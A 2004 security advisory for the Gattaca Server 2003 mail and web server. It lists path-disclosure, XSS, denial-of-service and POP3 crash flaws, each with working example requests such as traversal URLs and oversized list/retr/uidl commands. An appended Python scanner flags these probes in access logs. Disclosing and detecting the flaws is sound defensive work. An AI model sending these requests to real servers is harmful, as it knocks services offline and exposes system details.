www.r34ct.tk Security Advisory

Advisory Name: Gattaca Server 2003 (1.1.10.0)
Release Date: 07/15/2004
Application: Gattaca Server 2003 (1.1.10.0)
Platform: Windows XP/NT
Severity: Medium
Author: dr_insane (dr_insane@pathfinder.gr)

Description:

A high-performance Windows NT based mail and web server for building your own intranet. You may register unlimited users and use unlimited domains. It supports the POP3, SMTP and HTTP protocols and is integrated with the TMPL library, which allows you to write your own CGI scripts.

Multiple vulnerabilities have been identified in Gattaca Server 2003 that may allow a remote attacker to compromise a remote system.

Details:

Issue #1: Installation path exposure

A malicious user can gain knowledge of the installation path by sending a null byte to the server.

example: http://[host]/%00

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File [C:\Program Files\Gattaca Server\doc\webadmin\index.cgi] not found or invalid
Virtual Host at C:\Program Files\Gattaca Server\doc\webadmin\
--------------------------------------------------------------------------------

Issue #2: WWW-root path exposure

There is a second vulnerability that can be used to reveal the WWW root directory. Input passed to the "LANGUAGE" parameter in certain scripts isn't properly sanitised before being returned to the user.

example: http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[whatever]

Output:
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_head.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/web.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
(X)TMPL error
File /whatever/_foot.tmpl not found or invalid
Virtual Host at C:\GeeOSPub\wwwroot\
--------------------------------------------------------------------------------

Issue #3: Denial of Service attack

The third issue is a denial of service attack that can be used to slow a remote system. The CPU usage will hit 100% and the server will become unavailable.

Examples:
http://[host]/index.tmpl?HELPID=1000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=.
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=\
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//[whatever]&LANGUAGE=lang//en

Issue #4: Cross site scripting injection

Another vulnerability has been found in Gattaca Server which can be exploited by malicious people to conduct XSS attacks. This can be exploited by creating a malicious link including script code, which will be executed in a user's browser when the link is clicked or a malicious web site is visited. Successful exploitation may result in disclosure of various information (e.g. cookie-based authentication information) associated with the site running OmniHTTPd, or inclusion of malicious content which the user thinks is part of the real website.

examples:
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=[code]//[code]
http://[host]/web.tmpl?HELPID=8000&TEMPLATE=[code]//[code]&LANGUAGE=lang//en

Issue #5: Denial of service attack [2]

Gattaca Server fails to handle multiple open connections on ports 25/tcp and 110/tcp. By establishing about 600 connections to port 25 or port 110 the server will crash.

Issue #6: Denial of service attack [3] - message handling

By connecting and authenticating to the POP3 service, a remote user can crash the Gattaca service. There are multiple problems in the way the server handles the list, retr and uidl commands.

example:
C:\>telnet r34ct-krew 110
+OK GeeOS/1.1 POP3 Server ver 1.0, ready :-).<3824.50a943410378@pomonis>
user test
+OK User name accepted, password please :-|
pass w
+OK GeeOS mail box open ;-)
list 99999999999999999999999
retr 99999999999999999999999
uidl 98409583490583409539405

The commands above will crash the server. An error message will be generated:
"Unhandled exception in: geeosserv.exe (TMAIL.DLL): 0x0000005: access violation."

-------------snip---------------
0037A382 or eax,eax
0037A384 je 0037A4C5
0037A38A mov edi,eax
0037A38C shl edi,4
0037A38F cmp dword ptr [ebp+edi-7624h],0FFh
0037A397 je 0037A46F
0037A39D mov edi,eax
0037A39F shl edi,4
0037A3A2 cmp byte ptr [ebp+edi-762Ch],0
0037A3AA je 0037A416
0037A3AC mov edi,eax
0037A3AE mov esi,edi
0037A3B0 shl esi,4
------------snip----------------

Workaround: Use another product

Credit: Dr_insane
Http://members.lycos.co.uk/r34ct/

Feedback
Please send your comments to: dr_insane@pathfinder.gr
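The web-side probes in issues #1 to #4 all share two log-visible shapes: a null byte in the request path, or a TEMPLATE/LANGUAGE value that is not of the form shown in the advisory's own URLs ("skins//water", "lang//en"). The following detection logic is an added example, not code from the advisory or from the Gattaca vendor; it assumes Apache-style combined access-log lines and that those two value shapes are the only legitimate ones, both of which are assumptions derived from the advisory's examples rather than stated facts.

```python
# Added example (not from the advisory or the vendor): flag access-log requests
# that match the probe shapes described in issues #1-#4. Assumed (not stated on
# the page): Apache-style combined log lines, and that legitimate TEMPLATE and
# LANGUAGE values look like the advisory's own examples ("skins//water", "lang//en").
import re
from urllib.parse import parse_qsl, unquote, urlsplit

EXPECTED_SHAPE = {  # assumed legitimate shapes, derived from the advisory's URLs
    "TEMPLATE": re.compile(r"^skins//[A-Za-z0-9_-]+$"),
    "LANGUAGE": re.compile(r"^lang//[A-Za-z]{2,8}$"),
}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return (parameter, category) findings for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    if "\x00" in unquote(parts.path):           # issue #1: /%00 install-path leak
        findings.append(("path", "null-byte"))
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        key = key.upper()
        shape = EXPECTED_SHAPE.get(key)
        if shape is None or shape.match(value):
            continue                             # unknown parameter or normal value
        if ".." in value or value in ("/", "\\", ".") or value.endswith(("/", "\\")):
            findings.append((key, "traversal"))     # issues #2/#3: path-like values
        elif re.search(r"[<>\"']", value):
            findings.append((key, "script-chars"))  # issue #4: markup in value
        else:
            findings.append((key, "unexpected"))    # issue #2: echoed unknown name
    return findings

def scan_log(lines):
    """Scan log lines; return [(line_number, parameter, category), ...]."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for param, category in classify_request(match.group("target")):
                hits.append((lineno, param, category))
    return hits
# Constructed sample log: one normal request followed by four probes from the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Jul/2004:10:00:01 +0300] "GET /web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=lang//en HTTP/1.1" 200 512',
    '10.0.0.9 - - [15/Jul/2004:10:00:02 +0300] "GET /%00 HTTP/1.1" 500 180',
    '10.0.0.9 - - [15/Jul/2004:10:00:03 +0300] "GET /web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=/../../../../ HTTP/1.1" 500 420',
    '10.0.0.9 - - [15/Jul/2004:10:00:04 +0300] "GET /web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=%3Cx%3E//%3Cx%3E HTTP/1.1" 500 430',
    '10.0.0.9 - - [15/Jul/2004:10:00:05 +0300] "GET /web.tmpl?HELPID=8000&TEMPLATE=skins//water&LANGUAGE=whatever HTTP/1.1" 500 430',
]
```

Running `scan_log(SAMPLE_LOG)` yields one hit per probe line (2 through 5) and none for the normal request; the last DoS URL in issue #3, which only swaps the skin name, is indistinguishable from a normal request by this rule and would need a 404/CPU-based signal instead.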